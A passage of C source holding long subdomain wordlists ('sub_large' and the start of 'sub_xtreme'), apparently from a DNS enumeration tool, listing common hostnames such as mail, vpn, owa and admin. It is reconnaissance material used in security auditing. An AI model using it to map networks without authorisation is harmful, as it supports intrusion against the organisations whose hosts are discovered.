"newsfeed", "newsletter", "newton", "nfs", "nic", "nm", "nms", "nntp", "no", "noc", "ns", "ns-ext", "ns0", "ns01", "ns02", "ns03", "ns1", "ns10", "ns11", "ns2", "ns3", "ns4", "ns5", "ns6", "ns7", "nsa", "nsauth1", "nscache", "nscache1", "nss", "nsv6", "ntp", "ntp0", "ntp1", "ntp2", "null", "o1", "oa", "oberon", "office", "old", "omega", "online", "open", "openbsd", "openvpn", "ops", "oracle", "orange", "orion", "oscar", "outbound", "outlook", "owa", "ox", "p", "packages", "page", "pan", "panda", "panoramix", "papa", "partner", "pbx", "pc", "pc1", "pc10", "pc11", "pc12", "pc13", "pc14", "pc15", "pc16", "pc17", "pc18", "pc19", "pc2", "pc20", "pc21", "pc22", "pc23", "pc24", "pc25", "pc26", "pc27", "pc28", "pc29", "pc3", "pc30", "pc31", "pc32", "pc33", "pc34", "pc35", "pc36", "pc37", "pc38", "pc39", "pc4", "pc40", "pc41", "pc42", "pc43", "pc44", "pc45", "pc46", "pc47", "pc5", "pc6", "pc7", "pc8", "pc9", "pe", "peach", "pegasus", "people", "pgp", "phi", "phobos", "phoenix", "phone", "photo", "photos", "php", "pics", "pictures", "pipex-gw", "pki", "pluto", "pm", "po-1", "po-2", "poczta", "pop", "pop3", "pop3s", "portal", "pos1-0", "post", "posta", "pptp", "printer", "project", "projects", "prometheus", "proxy", "proxy1", "proxy2", "ps", "pub", "public", "puck", "q", "qa", "r", "r00", "r01", "r02", "r1", "r2", "ra", "radio", "radius", "radius1", "radius2", "rc", "red", "redhat", "register", "relay", "relay1", "relay2", "remote", "reports", "res1", "research", "resolv1", "resolver", "resolver1", "resolver2", "ripe", "rm", "robert", "root", "rose", "router", "rp", "rss", "rsync", "rt", "rt2", "rtr", "rwhois", "s", "s0", "s1", "s2", "s3", "s4", "s5", "sa", "sales", "sam", "sandbox", "sap", "sara", "saturn", "sbs", "sc", "scanner", "scotty", "se", "search", "secure", "security", "serial", "server", "server01", "server1", "server2", "server3", "server4", "server5", "service", "services", "sf", "sftp", "sh", "sharepoint", "shell", "shop", "sigma", "silver", "sip", "sirius", "six", "sixxs", "sixxs-gw", "skynet", "sl", "slackware", "smokeping", "sms", "smtp", "smtp-out", "smtp01", "smtp1", "smtp2", "smtp3", "smtp4", "smtp5", "snail", "snoopy", "so-0-1-0", "so-2-0-0", "software", "sol", "solaris", "sp", "spam", "spider", "spock", "sql", "squid", "squirrel", "src", "srv", "srv01", "srv02", "srv1", "srv2", "ssh", "ssl", "ssl-vpn", "sslvpn", "staff", "stage", "staging", "start", "stat", "static", "statistics", "stats", "stock", "storage", "store", "stream", "streaming", "submission", "subversion", "sun", "support", "sv", "svn", "sw-core1", "sw1", "switch", "syslog", "system", "szerver1", "szerver2", "szerver3", "szerver4", "szerver5", "t", "tango", "tao", "tarsier", "tau", "tb", "tc1", "te-1-2", "te-1-3", "te-2-1", "te-2-2", "tech", "telnet", "temp", "teredo", "test", "test1", "test2", "test6", "test6www", "testip6", "testipv6", "tftp", "the", "thor", "ticket", "tiger", "time", "titan", "titania", "tm", "tom", "tools", "tp", "tracker", "traffic", "training", "trinity", "ts", "ts1", "tt", "tunnel", "turing", "turtle", "tv", "u", "ubuntu", "uk", "unix", "up", "update", "updates", "upload", "ur01", "ur02", "ur04", "uranus", "us", "usenet", "user", "users", "uucp", "v", "v1", "v2", "v6", "v6gw", "v6www", "vab-core-1", "vab2-core-1", "vc", "ve", "ve1", "vega", "venus", "video", "video6", "virtual", "vista", "vl100", "vlad", "vlan2", "vm", "vm0", "vm1", "vm2", "voip", "vox", "voyager", "vpn", "vpn1", "vpn2", "vps", "vps1", "w", "w1", "w3", "wap", "wbm0", "wbm1", "web", "web01", "web02", "web03", "web1", "web2", "web3", "web4", "webcam", "webcast", "webdev", "weblog", "webmail", "webserver", "webservice", "webservices", "websites", "webstats", "whois", "wiki", "win", "windows", "wins", "wireless", "wlan", "wm", "wp", "wpad", "ws", "ws1", "ws2", "www", "www-1", "www-2", "www-3", "www-6", "www-ipv6", "www-v6", "www1", "www2", "www3", "www4", "www5", "www6", "www6test", "www7", "wwwipv6", "wwwtest6", "wwwv6", "x", "xcii", "y", "yankee", "z", "zebra", "zeus", "zimbra", "zs", "zulu", "" }; char *sub_large[] = { "0", "03", "1", "10", "11", "12", "13", "14", "15", "16", "17", "18", "19", "1a", "1b", "1c", "1cust1", "1cust10", "1cust11", "1cust12", "1cust13", "1cust14", "1cust15", "1cust16", "1cust17", "1cust18", "1cust19", "1cust2", "1cust20", "1cust21", "1cust22", "1cust23", "1cust24", "1cust25", "1cust26", "1cust27", "1cust28", "1cust29", "1cust3", "1cust30", "1cust31", "1cust32", "1cust33", "1cust34", "1cust35", "1cust36", "1cust37", "1cust38", "1cust39", "1cust4", "1cust40", "1cust41", "1cust42", "1cust43", "1cust44", "1cust45", "1cust46", "1cust47", "1cust48", "1cust49", "1cust5", "1cust50", "1cust51", "1cust52", "1cust53", "1cust54", "1cust55", "1cust56", "1cust57", "1cust58", "1cust59", "1cust6", "1cust60", "1cust61", "1cust62", "1cust63", "1cust64", "1cust65", "1cust66", "1cust67", "1cust68", "1cust69", "1cust7", "1cust70", "1cust71", "1cust72", "1cust73", "1cust74", "1cust75", "1cust76", "1cust77", "1cust78", "1cust79", "1cust8", "1cust80", "1cust81", "1cust82", "1cust83", "1cust84", "1cust85", "1cust86", "1cust87", "1cust88", "1cust89", "1cust9", "1cust90", "1cust91", "1cust92", "1cust93", "1cust94", "1cust95", "1cust96", "1cust97", "1cust98", "1cust99", "1d", "1e", "1f", "2", "20", "21", "22", "23", "24", "25", "26", "27", "28", "29", "2a", "2b", "2c", "2cust1", "2cust10", "2cust11", "2cust12", "2cust13", "2cust14", "2cust15", "2cust16", "2cust17", "2cust18", "2cust19", "2cust2", "2cust20", "2cust21", "2cust22", "2cust23", "2cust24", "2cust25", "2cust26", "2cust27", "2cust28", "2cust29", "2cust3", "2cust30", "2cust31", "2cust32", "2cust33", "2cust34", "2cust35", "2cust36", "2cust37", "2cust38", "2cust39", "2cust4", "2cust40", "2cust41", "2cust42", "2cust43", "2cust44", "2cust45", "2cust46", "2cust47", "2cust48", "2cust49", "2cust5", "2cust50", "2cust51", "2cust52", "2cust53", "2cust54", "2cust55", "2cust56", "2cust57", "2cust58", "2cust59", "2cust6", "2cust60", "2cust61", "2cust62", "2cust7", "2cust8", "2cust9", "2d", "2e", "2f", "3", "30", "31", "31337", "32", "33", "34", "35", "36", "37", "38", "39", "3a", "3b", "3c", "3d", "3e", "3f", "4", "40", "41", "42", "43", "44", "45", "46", "47", "48", "49", "4a", "4b", "4c", "4d", "4e", "4f", "5", "50", "51", "52", "53", "54", "55", "56", "57", "58", "59", "5a", "5b", "5c", "5d", "5e", "5f", "6", "60", "61", "62", "63", "64", "65", "66", "67", "68", "69", "6a", "6b", "6c", "6d", "6e", "6f", "6net", "6test", "6to4", "7", "70", "71", "72", "73", "74", "75", "76", "77", "78", "79", "7a", "7b", "7c", "7d", "7e", "7f", "8", "80", "81", "82", "83", "84", "85", "86", "87", "88", "89", "8a", "8b", "8c", "8d", "8e", "8f", "9", "90", "91", "92", "93", "94", "95", "96", "97", "98", "99", "9a", "9b", "9c", "9d", "9e", "9f", "a", "a0", "a01", "a02", "a1", "a2", "a20", "a21", "a3", "a4", "a5", "a6", "a7", "a8", "a9", "aa", "aaa", "aaaa", "ab", "abc", "ac", "access", "accounting", "accounts", "achilles", "acid", "ad", "adam", "admin", "adns1", "ads", "adsl", "ae", "ae-0", "ae-1", "ae-2", "af", "ag", "agenda", "agent", "aix", "ajax", "ak", "al", "alaska", "albuquerque", "alice", "allen", "alpha", "amanda", "ams-core-1", "andromeda", "announce", "anonsvn", "antares", "antispam", "antivirus", "ao", "ap", "apache", "apache2-adamant", "apache2-argon", "apache2-blow", "apache2-bongo", "apache2-cabo", "apache2-cid", "apache2-dap", "apache2-emu", "apache2-fritz", "apache2-grog", "apache2-heavy", "apache2-igloo", "apache2-jolly", "apache2-kant", "apache2-linus", "apache2-moon", "apache2-noxim", "apache2-ogle", "apache2-pat", "apache2-quack", "apache2-rank", "apache2-sith", "apache2-twiddle", "apache2-udder", "apache2-vat", "apache2-whippit", "apache2-xenon", "apache2-yak", "apache2-zoo", "api", "apollo", "app", "app1", "app2", "apple", "apply", "apps", "aq", "ar01", "ar02", "ar2", "arachne", "arcnet6", "ares", "argos", "ari", "ariel", "arizona", "artemis", "as", "as0", "as1", "as2", "asterisk", "asterix", "at", "athena", "atlanta", "atlantis", "atlas", "atom", "atw", "au", "aurora", "auth", "auth0", "auth00", "auth01", "auth02", "auth03", "auth2", "auto", "autodiscover", "av", "avalon", "avmail", "aw", "az", "b", "b0", "b02", "b1", "b10", "b2", "b3", "b4", "b5", "b6", "b7", "b8", "b9", "ba", "backbone", "backup", "backups", "baker", "banana", "barracuda", "bart", "bb", "bb1", "bbs", "bbs6", "bc", "bcast", "bd", "be", "bender", "beta", "bf", "bg", "bgp", "bi", "biblioteca", "biff", "billing", "bip1-gw", "biz", "bl", "black", "blackberry", "blackboard", "blacksun", "blade", "blog", "blog6", "blogs", "blue", "bm0", "bm1", "bm2", "bm3", "bnc", "bo", "bob", "border", "boston", "bot", "box", "bp", "br", "br2", "brain", "bravo", "bridge", "broadcast", "bsd", "bt", "bt6", "bug", "bugs", "bugzilla", "build", "bw", "by", "c", "c0", "c1", "c2", "c3", "c4", "c5", "c6", "c7", "c8", "c9", "ca", "cache", "cacti", "cafe", "calendar", "call", "callisto", "calypso", "cam", "canal", "careers", "cas", "casper", "castor", "cat", "catalog", "cb", "cc", "ccxvii", "cd", "ce", "ce1", "centos", "cert", "certificates", "cf", "cfengine", "cg", "cgi", "ch", "charlie", "charlotte", "charon", "chat", "chi", "chicago", "chimera", "chris", "chronos", "ci", "ci53", "ci96", "cisco", "cisco1", "cisco2", "citrix", "class", "cleveland", "client", "clients", "cloud", "club", "cluster", "clyde", "cm", "cm0", "cm1", "cm10", "cm11", "cm12", "cm13", "cm14", "cm15", "cm16", "cm17", "cm18", "cm19", "cm2", "cm20", "cm21", "cm22", "cm24", "cm25", "cm26", "cm27", "cm28", "cm29", "cm3", "cm31", "cm32", "cm33", "cm34", "cm35", "cm36", "cm37", "cm38", "cm39", "cm4", "cm41", "cm43", "cm44", "cm45", "cm47", "cm48", "cm49", "cm5", "cm50", "cm52", "cm53", "cm54", "cm56", "cm57", "cm58", "cm6", "cm60", "cm61", "cm62", "cm64", "cm67", "cm68", "cm69", "cm7", "cm74", "cm75", "cm76", "cm77", "cm78", "cm8", "cm80", "cm81", "cm82", "cm83", "cm85", "cm86", "cm87", "cm88", "cm90", "cm92", "cm94", "cm95", "cm96", "cm97", "cm98", "cm99", "cms", "cn", "co", "cocoa", "code", "colo0-gw", "colorado", "com", "community", "compaq", "conf", "conference", "connect", "console", "constellation", "contact", "content", "cook", "core", "core1", "core2", "corona", "corp", "corpmail", "correo", "cp", "cpe", "cq", "cr0", "cr1", "cr2", "cr3", "cricket", "crm", "cs", "csg", "cust", "customer", "cv", "cvs", "cw", "cz", "d", "d0", "d1", "d1-0", "d10", "d11", "d12", "d13", "d14", "d15", "d16", "d17", "d18", "d19", "d2", "d20", "d21", "d22", "d23", "d24", "d25", "d26", "d27", "d28", "d29", "d3", "d30", "d31", "d32", "d33", "d34", "d35", "d36", "d37", "d38", "d39", "d4", "d40", "d41", "d42", "d43", "d44", "d45", "d46", "d47", "d48", "d49", "d5", "d50", "d51", "d52", "d53", "d54", "d55", "d56", "d57", "d58", "d59", "d6", "d60", "d61", "d62", "d63", "d64", "d65", "d66", "d67", "d68", "d69", "d7", "d70", "d71", "d72", "d73", "d74", "d75", "d76", "d77", "d78", "d79", "d8", "d80", "d81", "d82", "d83", "d84", "d85", "d86", "d87", "d88", "d89", "d9", "d90", "d91", "d92", "d93", "d94", "d95", "d96", "d97", "d98", "d99", "da", "data", "database", "db", "db0", "db01", "db1", "db2", "dc", "dc1", "dd", "dds", "de", "de-cix", "debian", "decix", "default", "defiant", "dell", "delta", "demo", "demon", "demon-gw", "depot", "des", "design", "desktop", "dev", "dev01", "dev1", "dev2", "deve", "devel", "develop", "developers", "development", "df", "dh", "dhcp", "dhcp-pool", "dhcp1", "dhcp2", "dial", "diana", "dict", "digital", "dino", "dione", "dirac", "directory", "disc", "disco", "discovery", "disk", "dist", "dk", "dl", "dmz", "dn", "dns", "dns-2", "dns0", "dns00", "dns01", "dns02", "dns03", "dns1", "dns2", "dns3", "dns4", "dns6", "dnscache1", "dnscache2", "do", "doc", "docs", "domain", "domains", "domino", "doom", "download", "downloads", "dr", "drac", "dragon", "drupal", "ds", "dsl", "dt", "dx", "dy", "dyn", "dynamic", "e", "e0", "e1", "e2", "e3", "e4", "e5", "e6", "e7", "e8", "e9", "ea", "eagle", "earth", "eb", "ec", "echo", "ed", "edge", "edu", "ee", "ef", "efnet", "eh", "em", "email", "en", "enable", "enc", "eng", "engineering", "enigma", "enterprise", "enum", "eo", "ep", "epp", "eprints", "er", "erp", "es", "et", "eta", "eth0", "eth1", "eth2", "eu", "eunet-gw", "eunomia", "europa", "eve", "events", "ex", "exch", "exchange", "exeter", "extern", "extranet", "f", "f0", "f1", "f2", "f3", "f4", "f5", "f6", "f7", "f8", "f9", "fa", "fa-0-0", "fa0-0", "falcon", "fax", "fb", "fc", "fd", "fe", "fe0-0", "fe2-0", "feeds", "ff", "fg", "fi", "fiberlink", "fido", "files", "fileserver", "filter", "finance", "finger", "fire", "firewall", "fl", "flash", "flow", "fm", "forum", "forums", "foto", "fotos", "fox", "foxtrot", "fp", "fr", "france", "frank", "fred", "free", "freebsd", "freemail", "front", "fry", "fs", "fs1", "ftp", "ftp0", "ftp1", "ftp2", "ftp3", "ftp6", "fun", "fw", "fw01", "fw1", "fw1-gw", "fw2", "fx", "g", "gaia", "galatea", "galeria", "galerie", "gallery", "gamma", "gandalf", "gate", "gate1", "gatekeeper", "gateway", "gauss", "gc", "ge-0", "ge-0-0-0-0", "ge0-1", "ge0-2", "geb", "gemini", "gentoo", "germany", "gh", "gi0-1", "gigabitethernet0", "gigabitethernet1", "gis", "git", "gk", "gm", "go", "gold", "golf", "gopher", "gp", "gps", "gr", "green", "group", "groups", "gs", "gt", "guest", "guide", "gw", "gw-ipv6", "gw01", "gw1", "gw2", "gw3", "gw6", "gx", "gz", "h", "h1", "h2", "h3", "h4", "ha", "hades", "hal", "hammer", "hc", "hd", "he", "helene", "helios", "helium", "hello", "help", "helpdesk", "hera", "hercules", "hermes", "hg", "hh", "hi", "hidden", "hk", "hm", "hobbes", "hobby-gw", "home", "homepage", "homer", "honeypot", "host", "host-2", "host-3", "host-4", "host-5", "host-6", "host0", "host01", "host02", "host1", "host10", "host11", "host12", "host13", "host14", "host15", "host16", "host17", "host18", "host19", "host2", "host20", "host21", "host22", "host23", "host24", "host25", "host26", "host27", "host28", "host29", "host3", "host30", "host31", "host32", "host33", "host34", "host35", "host36", "host37", "host38", "host39", "host4", "host40", "host41", "host42", "host43", "host44", "host45", "host46", "host47", "host48", "host49", "host5", "host50", "host51", "host52", "host53", "host54", "host55", "host56", "host57", "host58", "host59", "host6", "host60", "host61", "host62", "host63", "host64", "host65", "host66", "host67", "host68", "host69", "host7", "host70", "host71", "host72", "host73", "host74", "host75", "host76", "host77", "host78", "host79", "host8", "host80", "host81", "host82", "host83", "host84", "host85", "host86", "host87", "host88", "host89", "host9", "host90", "host91", "host92", "host93", "host94", "host95", "host96", "host97", "host98", "host99", "hosting", "hotel", "hotspot", "houston", "hp", "hq", "hs", "http", "https", "hu", "hub", "hwmaint", "hydra", "hyperion", "i", "iax", "ibm", "ic", "ice", "icecube", "icons", "ict", "id", "idp", "ids", "ie", "if", "if-0-0-0", "if-10-0-0", "if-2-0-0", "ik", "illusion", "im", "images", "imap", "imap4", "imaps", "img", "in", "inc", "inet", "inferno", "info", "ins2", "inside", "install", "int", "intern", "internal", "international", "internet", "internet2", "intra", "intranet", "invalid", "investor", "io", "ip", "ip00", "ip01", "ip02", "ip03", "ip04", "ip05", "ip06", "ip07", "ip1", "ip10", "ip11", "ip12", "ip13", "ip14", "ip15", "ip16", "ip17", "ip18", "ip19", "ip2", "ip20", "ip21", "ip22", "ip23", "ip24", "ip25", "ip26", "ip27", "ip28", "ip29", "ip3", "ip30", "ip31", "ip32", "ip33", "ip34", "ip35", "ip36", "ip37", "ip38", "ip39", "ip4", "ip40", "ip41", "ip42", "ip43", "ip44", "ip45", "ip46", "ip47", "ip48", "ip49", "ip5", "ip50", "ip51", "ip52", "ip53", "ip54", "ip55", "ip56", "ip57", "ip58", "ip59", "ip6", "ip60", "ip61", "ip62", "ip65", "ip66", "ip67", "ip68", "ip69", "ip6test", "ip7", "ip70", "ip71", "ip72", "ip73", "ip74", "ip75", "ip76", "ip77", "ip78", "ip79", "ip8", "ip80", "ip81", "ip82", "ip83", "ip84", "ip85", "ip86", "ip87", "ip88", "ip89", "ip9", "ip90", "ip91", "ip92", "ip93", "ip94", "ip95", "ip96", "ip97", "ip98", "ip99", "iphone", "ipmi", "ipsec", "iptv", "ipv4", "ipv6", "ipv6-gw", "ipv6-router", "ipv6cam", "ipv6forum", "ipv6gw", "ipv6test", "ipx", "irc", "irc6", "ircd", "ireland", "iris", "irssi", "is", "isaiah", "isis", "issues", "it", "itchy", "ix", "ix-2-2", "j", "jabber", "janus", "java", "jg", "jo", "jobs", "jp", "juliet", "jupiter", "jw", "k", "ka", "kb", "kdc1", "kepler", "kerberos", "kernel", "keyserver", "kf", "king", "kk", "kl", "km", "ks", "kst-core-1", "kvm", "kz", "l0", "l1", "la", "lab", "labs", "laforge", "lambda", "lan", "lan-gate", "laptop", "lb1", "lc", "ldap", "ldap1", "ldap2", "learn", "legacy", "lenny", "leo", "lg", "li", "lib", "library", "lim-core-1", "lima", "link", "linux", "lisa", "list", "listes", "lists", "listserv", "listserver", "live", "lj", "lm", "lo", "lo-0", "lo-1", "lo0", "lo0-0", "lo1", "local", "localhost", "log", "logger", "logging", "loghost", "login", "logs", "loki", "london", "loop0", "loopback0", "lorien", "lotus", "ls", "lt", "lu", "luke", "luna", "lxxxix", "m", "m-net", "m1", "m2", "ma", "mac", "mail", "mail0", "mail01", "mail02", "mail03", "mail1", "mail10", "mail11", "mail12", "mail13", "mail14", "mail15", "mail16", "mail2", "mail20", "mail3", "mail4", "mail5", "mail6", "mail7", "mail8", "mail9", "mailbox", "mailer", "mailgate", "mailgw", "mailgw3", "mailhost", "mailin", "mailing", "mailman", "mailout", "mailrelay", "mailserver", "mailsrv", "mailtest", "main", "manage", "management", "map", "maps", "marketing", "mars", "marvin", "mary", "master", "matrix", "max", "maxwell", "mb", "mc", "md", "me", "media", "member", "members", "mercury", "merlin", "messenger", "meta", "mi", "mickey", "mike", "minerva", "miranda", "mirror", "mirrors", "mj", "mk", "ml", "mm", "mobile", "mon", "mon1", "mon2", "monitor", "monitor01", "monitoring", "moodle", "moon", "mordor", "moria", "moscow", "mout", "movies", "mp", "mp3", "mpeg", "mr", "mrtg", "ms", "ms1", "mta", "mta1", "mta2", "mta3", "mta4", "mu", "multimedia", "munin", "music", "mv", "mx", "mx0", "mx01", "mx02", "mx03", "mx1", "mx10", "mx11", "mx12", "mx13", "mx14", "mx15", "mx16", "mx17", "mx18", "mx19", "mx2", "mx20", "mx21", "mx22", "mx23", "mx24", "mx25", "mx26", "mx27", "mx28", "mx29", "mx3", "mx30", "mx31", "mx32", "mx33", "mx34", "mx35", "mx36", "mx37", "mx38", "mx39", "mx4", "mx40", "mx41", "mx42", "mx43", "mx44", "mx45", "mx46", "mx47", "mx48", "mx49", "mx5", "mx50", "mx51", "mx52", "mx53", "mx54", "mx55", "mx56", "mx57", "mx58", "mx59", "mx6", "mx60", "mx61", "mx62", "mx63", "mx64", "mx65", "mx66", "mx67", "mx68", "mx69", "mx7", "mx70", "mx71", "mx72", "mx73", "mx74", "mx75", "mx76", "mx77", "mx78", "mx79", "mx8", "mx80", "mx81", "mx82", "mx83", "mx84", "mx85", "mx86", "mx87", "mx88", "mx89", "mx9", "mx90", "mx91", "mx92", "mx93", "mx94", "mx95", "mx96", "mx97", "mx98", "mx99", "my", "mysql", "mysql1", "mz", "n", "na", "nagios", "name", "nameserver", "nas", "nat", "nb", "nc", "nd", "nds", "ne", "neo", "neon", "neptun", "neptune", "nessus", "net", "netapp", "netlab", "netstat", "network", "nevada", "new", "news", "newsfeed", "newsfeeds", "newsletter", "newton", "newyork", "nfs", "ni", "nic", "nl", "nm", "nms", "nn", "nntp", "no", "noc", "node", "node1", "node2", "nokia", "notes", "november", "ns", "ns-ext", "ns0", "ns01", "ns02", "ns03", "ns1", "ns10", "ns11", "ns15", "ns2", "ns3", "ns4", "ns5", "ns6", "ns7", "nsa", "nsauth1", "nscache", "nscache1", "nscache2", "nss", "nsv6", "ntp", "ntp0", "ntp1", "ntp2", "ntp3", "null", "nx", "o1", "oa", "ob", "oberon", "oc", "oc48-pos9-0", "odin", "of", "office", "oh", "ojp-apply", "old", "oleane-gw", "omega", "one", "online", "op", "open", "openbsd", "openvpn", "operations", "ops", "oracle", "orange", "order", "orion", "os", "oscar", "out", "outbound", "outlook", "owa", "ox", "oz", "p", "p1", "p2", "pa", "packages", "page", "pages", "pan", "panda", "pandora", "panoramix", "papa", "paris", "partner", "partners", "pat", "pbx", "pc", "pc01", "pc02", "pc03", "pc04", "pc1", "pc10", "pc11", "pc12", "pc13", "pc14", "pc15", "pc16", "pc17", "pc18", "pc19", "pc2", "pc20", "pc21", "pc22", "pc23", "pc24", "pc25", "pc26", "pc27", "pc28", "pc29", "pc3", "pc30", "pc31", "pc32", "pc33", "pc34", "pc35", "pc36", "pc37", "pc38", "pc39", "pc4", "pc40", "pc41", "pc42", "pc43", "pc44", "pc45", "pc46", "pc47", "pc48", "pc49", "pc5", "pc50", "pc51", "pc52", "pc53", "pc54", "pc55", "pc56", "pc57", "pc58", "pc59", "pc6", "pc60", "pc61", "pc62", "pc63", "pc64", "pc65", "pc66", "pc67", "pc68", "pc69", "pc7", "pc70", "pc71", "pc72", "pc73", "pc74", "pc75", "pc76", "pc77", "pc78", "pc79", "pc8", "pc80", "pc81", "pc82", "pc83", "pc84", "pc85", "pc86", "pc87", "pc88", "pc89", "pc9", "pc90", "pc91", "pc92", "pc93", "pc94", "pc95", "pc96", "pc97", "pc98", "pc99", "pd", "pda", "pdc", "pe", "peach", "pegasus", "people", "pf", "pgp", "phi", "phobos", "phoenix", "phone", "photo", "photos", "php", "pi", "picard", "pics", "pictures", "pipex-gw", "pironet", "pix", "pk", "pki", "pl", "pluto", "pm", "pm1", "po", "po-1", "po-2", "po1", "poczta", "pop", "pop2", "pop3", "pop3s", "portal", "pos1-0", "poseidon", "posix", "post", "posta", "powertech-gw", "ppp2", "pptp", "pq", "prensa", "preprod", "press", "print", "printer", "printserver", "priv", "privat", "prod", "project", "projects", "prometheus", "proton", "proxy", "proxy1", "proxy2", "ps", "pt", "pub", "public", "puck", "q", "qa", "qp", "quake", "quark", "quebec", "queen", "r", "r00", "r01", "r02", "r1", "r2", "ra", "radio", "radius", "radius1", "radius2", "raptor", "rc", "rcs", "rd", "read", "red", "redhat", "redirect2", "reg", "register", "relay", "relay01", "relay02", "relay1", "relay2", "releases", "remote", "reports", "res", "res1", "res2", "research", "reseller", "reserved", "resolv1", "resolver", "resolver1", "resolver2", "reverse", "ripe", "ris", "rm", "rn", "rns2", "ro", "robert", "romeo", "root", "rose", "router", "router1", "router2", "rp", "rr", "rss", "rsync", "rt", "rt2", "rtr", "ru", "rv", "rwhois", "rz", "s", "s0", "s01", "s1", "s10", "s11", "s2", "s3", "s4", "s5", "s6", "s7", "s8", "s9", "sa", "sales", "sam", "sandbox", "sap", "sara", "saturn", "sb", "sbs", "sc", "scanner", "scotty", "se", "search", "search6", "sec", "sec1", "secure", "securemail", "security", "serial", "server", "server01", "server1", "server2", "server3", "server4", "server5", "server6", "servers", "service", "services", "services1", "servidor", "sf", "sftp", "sg", "sh", "share", "sharepoint", "shell", "shell1", "shop", "sigma", "silc", "silver", "sip", "sirius", "site", "six", "sixxs", "sixxs-gw", "sj", "sk", "skynet", "sl", "slackware", "sm", "smc", "smokeping", "sms", "smtp", "smtp-out", "smtp01", "smtp02", "smtp1", "smtp10", "smtp2", "smtp3", "smtp4", "smtp5", "smtp6", "smtp7", "smtp8", "snail", "snmp-trap", "snoopy", "so-0-0-0", "so-0-0-1", "so-0-1-0", "so-2-0-0", "software", "sol", "solaris", "solutions", "source", "sp", "spain", "spam", "spider", "spiderman", "spl", "splunk", "spock", "sprint", "sql", "sql1", "squid", "squirrel", "sr", "src", "srv", "srv01", "srv02", "srv1", "srv2", "srv3", "ssc", "ssh", "ssl", "ssl-vpn", "sslvpn", "staff", "stage", "staging", "star", "start", "stat", "static", "statistics", "stats", "stock", "storage", "store", "stream", "streaming", "student", "studio", "su", "sub", "submission", "submit", "subversion", "sun", "sun01", "sun02", "sun1", "superman", "support", "survey", "sv", "sv1", "svn", "svr01", "svr02", "sw", "sw-core1", "sw0", "sw01", "sw1", "sw2", "switch", "switch1", "sydney", "sysadmin", "syslog", "system", "sz", "szerver1", "szerver2", "szerver3", "szerver4", "szerver5", "t", "t1", "ta", "talk", "tango", "tao", "tarsier", "tau", "tb", "tc", "tc1", "te-1-2", "te-1-3", "te-2-1", "te-2-2", "te-3-1", "team", "tech", "techsupport", "telephone", "telnet", "temp", "teredo", "teredo-gw", "teredo-relay", "terminal", "terror", "test", "test1", "test2", "test6", "test6www", "testbed", "testing", "testip6", "testipv6", "testsite", "tftp", "the", "theta", "thor", "ticket", "tiger", "time", "titan", "titania", "tj", "tk", "tm", "to", "toad", "tom", "tomocha", "tool", "tools", "tour", "tp", "tr", "tracker", "traffic", "training", "trinity", "triton", "ts", "ts1", "tsv01", "tt", "tu0", "tunnel", "tunnel2", "tunnelbroker", "turing", "turtle", "tv", "tw", "tx", "u", "uat", "ubuntu", "ui", "uk", "undernet-gw", "uni", "uniform", "union", "unix", "unknown", "up", "update", "updates", "upload", "upsilon", "ur", "ur01", "ur02", "ur03", "ur04", "uranus", "us", "usa", "usenet", "user", "users", "ut", "uu", "uucp", "uw", "uz", "v", "v1", "v2", "v6", "v6gw", "v6www", "vaak", "vab-core-1", "vab2-core-1", "vault", "vc", "vds", "ve", "ve1", "ve8", "vega", "venus", "victor", "video", "video6", "videos", "viking", "violet", "vip", "virtual", "vista", "vk", "vl-6", "vl10", "vl100", "vl102", "vlad", "vlan-100", "vlan1", "vlan100", "vlan2", "vm", "vm0", "vm1", "vm2", "vm3", "vmm", "vnc", "vo", "voice", "voip", "vox", "voyager", "vpn", "vpn1", "vpn2", "vps", "vps1", "vps2", "vr", "vs", "vt", "vw", "vz", "w", "w-04", "w1", "w2", "w3", "wallet", "wan", "wap", "warlord", "washington", "wbm0", "wbm1", "wc", "web", "web0", "web01", "web02", "web03", "web1", "web2", "web3", "web4", "web5", "webadmin", "webcache", "webcam", "webcast", "webconf", "webct", "webdev", "webhelp", "weblog", "webmail", "webmail2", "webmaster", "webmin", "webserv", "webserver", "webservice", "webservices", "websites", "websrv", "webstats", "webster", "welcome", "west", "wg", "wh", "wh1", "whois", "wi", "wifi", "wiki", "win", "win2008", "win2k", "win2k8", "windows", "windowsxp", "winproxy", "wins", "winxp", "wireless", "wk", "wl", "wlan", "wm", "wordpress", "work", "world", "wp", "wpad", "wq", "ws", "ws1", "ws2", "ws3", "ws4", "ws5", "wt", "www", "www-1", "www-2", "www-3", "www-6", "www-ipv6", "www-v6", "www-v6v4", "www01", "www03", "www1", "www2", "www3", "www4", "www5", "www6", "www6test", "www7", "www8", "www9", "wwwdev", "wwwipv6", "wwwtest6", "wwwv6", "wx", "x", "x-ray", "xb", "xc", "xcii", "xd", "xdmcp", "xe-0-2-0-0", "xen", "xi", "xj", "xk", "xml", "xo", "xp", "xs", "xt", "xtel", "xx", "xy", "y", "yankee", "yellow", "yl", "yn", "young", "yp", "ys", "yv", "z", "za", "zc", "zebra", "zeus", "zimbra", "zk", "zm", "zo", "zope", "zq", "zs", "zt", "zu", "zulu", "zw", "" }; char *sub_xtreme[] = { "0", "01", "02", "03", "04", "05", "1", "10", "10gigabitethernet1-2", "11", "12", "13", "14", "15", "16", "17", "18", "19", "1a", "1b", "1c", "1cust1", "1cust10", "1cust11", "1cust12", "1cust13", "1cust14", "1cust15", "1cust16", "1cust17", "1cust18", "1cust19", "1cust2", "1cust20", "1cust21", "1cust22", "1cust23", "1cust24", "1cust25", "1cust26", "1cust27", "1cust28", "1cust29", "1cust3", "1cust30", "1cust31", "1cust32", "1cust33", "1cust34", "1cust35", "1cust36", "1cust37", "1cust38", "1cust39", "1cust4", "1cust40", "1cust41", "1cust42", "1cust43", "1cust44", "1cust45", "1cust46", "1cust47", "1cust48", "1cust49", "1cust5", "1cust50", "1cust51", "1cust52", "1cust53", "1cust54", "1cust55", "1cust56", "1cust57", "1cust58", "1cust59", "1cust6", "1cust60", "1cust61", "1cust62", "1cust63", "1cust64", "1cust65", "1cust66", "1cust67", "1cust68", "1cust69", "1cust7", "1cust70", "1cust71", "1cust72", "1cust73", "1cust74", "1cust75", "1cust76", "1cust77", "1cust78", "1cust79", "1cust8", "1cust80", "1cust81", "1cust82", "1cust83", "1cust84", "1cust85", "1cust86", "1cust87", "1cust88", "1cust89", "1cust9", "1cust90", "1cust91", "1cust92", "1cust93", "1cust94", "1cust95", "1cust96", "1cust97", "1cust98", "1cust99", "1d", "1e", "1f", "1g-bge0", "1g-eth0", "2", "20", "21", "21cust1", "21cust10", "21cust11", "21cust12", "21cust13", "21cust14", "21cust15", "21cust16", "21cust17", "21cust18", 